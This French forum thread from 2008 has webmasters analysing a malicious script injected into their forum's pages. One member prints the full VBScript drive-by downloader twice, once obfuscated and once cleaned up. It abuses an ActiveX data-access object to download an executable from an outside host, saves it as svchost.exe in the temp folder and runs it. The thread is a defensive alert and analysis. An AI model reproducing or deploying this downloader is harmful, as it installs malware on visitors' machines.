|
Voir le sujet précédent :: Voir le sujet suivant
|
| Auteur |
Message |
| |
|
LeMulotNocturne
WRInaute passionné
Inscrit le: 01 Juin 2005
Messages: 594
Localisation: Lyon
|
 Posté le : Lun Mar 03, 2008 12:09 Sujet du message: ATTENTION : "Microsoft Data Access" sur WRI ! Le r |
|
|
Hello,
juste pour signaler que le problème rencontré il y a quelques mois sur WRI est de nouveau là...
Sous IE, alerte sur toutes les pages du forum pour prévenir de l'installation d'un composant "Microsoft Data Access".
Inspection rapide de la page avec Firebug : exactement le même symptôme que le coup d'avant, un script JS est chargé depuis un domaine externe à WRI (contenu du script pseudo crypté avec décriptage intégré en JS).
Je vous laisse regarder, cela ne sent pas bon du tout... |
|
| |
|
 |
aladdin
WRInaute passionné
Inscrit le: 29 Avr 2005
Messages: 707
|
| Posté le : Lun Mar 03, 2008 12:52 Sujet du message: ATTENTION : "Microsoft Data Access" sur WRI ! Le r |
|
|
humm effectivement ... il y a un script bizzard ! un certain library.js qui provient de -www.hotalk.com
et en décryptant son contenu je trouve ca :
| Code: |
<script language="VBScript">
on error resume next
t1= "http://"
t2= "www."
t3= "hot"
t4= "a"
t5= "tk.c"
t6= "om/eventlog"
t7= ".exe"
tcsafe = t1&t2&t3&t4&t5&t6&t7
i11="o"
i12="bj"
i13="ect"
i1=i11&i12&i13
i21="cl"
i22="ass"
i23="id"
i2= i21&i22&i23
i31="clsid:BD"
i32="96C5"
i33="56-6"
i34="5A3-1"
i35="1D0-9"
i36="83A-00C"
i37="04FC2"
i38="9E36"
i3=i31&i32&i33&i34&i35&i36&i37&i38
i41="Micros"
i42="oft.XML"
i43="HTTP"
i4=i41&i42&i43
i51="Shel"
i52="l.App"
i53="lication"
i5=i51&i52&i53
i61="Scri"
i62="pt"
i63="ing.FileS"
i64="ystemObject"
i6=i61&i62&i63&i64
sub doit(i5,Y9)
set Ye = Yc.createobject(i5,"")
dd="open"
Ye.ShellExecute Y9,BBS,BBS,dd,0
end sub
Set Yc = document.createElement(i1)
Yc.setAttribute i2, i3
Yi=i4
Set Yd = Yc.CreateObject(Yi,"")
b1="Adod"
b2="b."
b3="Stre"
b4="am"
b5=b1&b2&b3&b4
Yg=b5
set Ya = Yc.createobject(Yg,"")
Ya.type = 1
Yh="GET"
Yd.Open Yh, tcsafe, False
Yd.Send
Y91="s"
Y92="vchos"
Y93="t.e"
Y94="xe"
Y9=Y91&Y92&Y93&Y94
set Yb = Yc.createobject(i6,"")
set Ye = Yb.GetSpecialFolder(2)
Ya.open
Y9= Yb.BuildPath(Ye,Y9)
Ya.write Yd.responseBody
Ya.savetofile Y9,2
Ya.close
call doit(i5,Y9)
</script>
|
sur les premières lignes du code on peu bien lire :
-http://www.hotatk.com/eventlog.exe
un exe ! ...
des explications ?? |
|
| |
|
|
LeMulotNocturne
WRInaute passionné
Inscrit le: 01 Juin 2005
Messages: 594
Localisation: Lyon
|
| Posté le : Lun Mar 03, 2008 13:21 Sujet du message: ATTENTION : "Microsoft Data Access" sur WRI ! Le r |
|
|
Ca pu grave...
Un script qui lance un process "svchost.exe", humm.... si c'est pas un virus ou un troyen je me les c.....  |
|
| |
|
|
aladdin
WRInaute passionné
Inscrit le: 29 Avr 2005
Messages: 707
|
| Posté le : Lun Mar 03, 2008 14:00 Sujet du message: ATTENTION : "Microsoft Data Access" sur WRI ! Le r |
|
|
heuu je n'irai pas à conclure tout de suite ... mais une chose est sure, ce machin tente de lancer un executable.
la question est : comment ce script a pu arriver sur WRI ?? une pub ? |
|
| |
|
|
SqTH
Nouveau WRInaute
Inscrit le: 27 Fév 2008
Messages: 9
|
| Posté le : Lun Mar 03, 2008 14:22 Sujet du message: ATTENTION : "Microsoft Data Access" sur WRI ! Le r |
|
|
En effet, sous IE, sophos a hurlé.
Rien sous Firefox. |
|
| |
|
|
aladdin
WRInaute passionné
Inscrit le: 29 Avr 2005
Messages: 707
|
| Posté le : Lun Mar 03, 2008 14:29 Sujet du message: ATTENTION : "Microsoft Data Access" sur WRI ! Le r |
|
|
| comme vous pouvez le voir c'est un vbscript donc sous FF ca ne risque pas de s'exécuter ... |
|
| |
|
|
aladdin
WRInaute passionné
Inscrit le: 29 Avr 2005
Messages: 707
|
| Posté le : Lun Mar 03, 2008 14:40 Sujet du message: ATTENTION : "Microsoft Data Access" sur WRI ! Le r |
|
|
plus aucun doute, c'est un virus/malware qui tente de s'installer en tentant deux exploits IE avec ajax et adobe
voici le script que j'ai un peu décrypter pour y voir plus claire
| Code: |
<script language="VBScript">
on error resume next
tcsafe = http://www.hotatk.com/eventlog.exe
i1=object
i2= classid
i3=clsid:BD96C556-65A3-11D0-983A-00C04FC29E36
i4=Microsoft.XMLHTTP
i5=Shell.Application
i6=Scripting.FileSystemObject
sub doit(i5,Y9)
set Ye = Yc.createobject(i5,"")
dd="open"
Ye.ShellExecute Y9,BBS,BBS,dd,0
end sub
Set Yc = document.createElement(i1)
Yc.setAttribute i2, i3
Yi=i4
Set Yd = Yc.CreateObject(Yi,"")
Yg="Adodb.Stream"
set Ya = Yc.createobject(Yg,"")
Ya.type = 1
Yh="GET"
Yd.Open Yh, tcsafe, False
Yd.Send
Y9="svchost.exe"
set Yb = Yc.createobject(i6,"")
set Ye = Yb.GetSpecialFolder(2)
Ya.open
Y9= Yb.BuildPath(Ye,Y9)
Ya.write Yd.responseBody
Ya.savetofile Y9,2
Ya.close
call doit(i5,Y9)
</script>
|
je me demande toujours comment ca a pu atterrir sur WRI ??
une chose est sure, si vous n'avez pas un antivirus et que vous avez ouvert WRI avec internet explorer vous êtes infecté ... 
en attendant l'intervention de l'admin, y'aurai t il un moyen pour mettre une petite alerte quelque part ? |
|
| |
|
|
LeMulotNocturne
WRInaute passionné
Inscrit le: 01 Juin 2005
Messages: 594
Localisation: Lyon
|
| Posté le : Lun Mar 03, 2008 14:50 Sujet du message: ATTENTION : "Microsoft Data Access" sur WRI ! Le r |
|
|
| aladdin a écrit: |
| une chose est sure, si vous n'avez pas un antivirus et que vous avez ouvert WRI avec internet explorer vous êtes infecté ... |
pas forcement, je suis sous IE7 et c'est bien le navigateur qui a hurlé le premier (sécurité contre les install sous IE7).
| aladdin a écrit: |
| en attendant l'intervention de l'admin, y'aurai t il un moyen pour mettre une petite alerte quelque part ? |
recommander ce topic ? |
|
| |
|
|
aladdin
WRInaute passionné
Inscrit le: 29 Avr 2005
Messages: 707
|
| Posté le : Lun Mar 03, 2008 14:54 Sujet du message: ATTENTION : "Microsoft Data Access" sur WRI ! Le r |
|
|
une reco ...
en attendant Olivier ... |
|
| |
|
|
SqTH
Nouveau WRInaute
Inscrit le: 27 Fév 2008
Messages: 9
|
| Posté le : Lun Mar 03, 2008 15:02 Sujet du message: ATTENTION : "Microsoft Data Access" sur WRI ! Le r |
|
|
| Un bref coup d'oeil au code et je vois que le script ewst appellé dans une DIV de xiti... oO |
|
| |
|
|
aladdin
WRInaute passionné
Inscrit le: 29 Avr 2005
Messages: 707
|
| Posté le : Lun Mar 03, 2008 15:10 Sujet du message: ATTENTION : "Microsoft Data Access" sur WRI ! Le r |
|
|
oui mais à mon avis ca ne doit pas être xiti mais un script php qui permet de gérer les tags sur WRI qui doit être concerné (Confirmation de l'admin ??) .
car ca sent plus l'injection de code qu'une infection au niveau de xiti ... |
|
| |
|
|
WebRankInfo
Administrateur du site
Inscrit le: 19 Avr 2002
Messages: 13765
Localisation: Toulouse
|
| Posté le : Lun Mar 03, 2008 15:23 Sujet du message: ATTENTION : "Microsoft Data Access" sur WRI ! Le r |
|
|
| je vais regarder ça merci de m'avoir prévenu |
|
| |
|
|
manHa
WRInaute accro
Inscrit le: 27 Juil 2007
Messages: 1034
|
| Posté le : Lun Mar 03, 2008 18:00 Sujet du message: ATTENTION : "Microsoft Data Access" sur WRI ! Le r |
|
|
| Euh et si j'ai fais Activer le controlX? Si j'ai cliqué? |
|
| |
|
|
e-kiwi
Modérateur
Inscrit le: 23 Déc 2003
Messages: 12073
Localisation: Toulouse
|
| Posté le : Lun Mar 03, 2008 18:00 Sujet du message: ATTENTION : "Microsoft Data Access" sur WRI ! Le r |
|
|
un seul mot : AIE
 |
|
| |
|
|
arnaudmn
WRInaute accro
Inscrit le: 11 Mai 2005
Messages: 1337
|
| Posté le : Lun Mar 03, 2008 18:13 Sujet du message: ATTENTION : "Microsoft Data Access" sur WRI ! Le r |
|
|
| Ca le fait encore ou pas ? Parce que je vois rien ... |
|
| |
|
|
| |
|
|
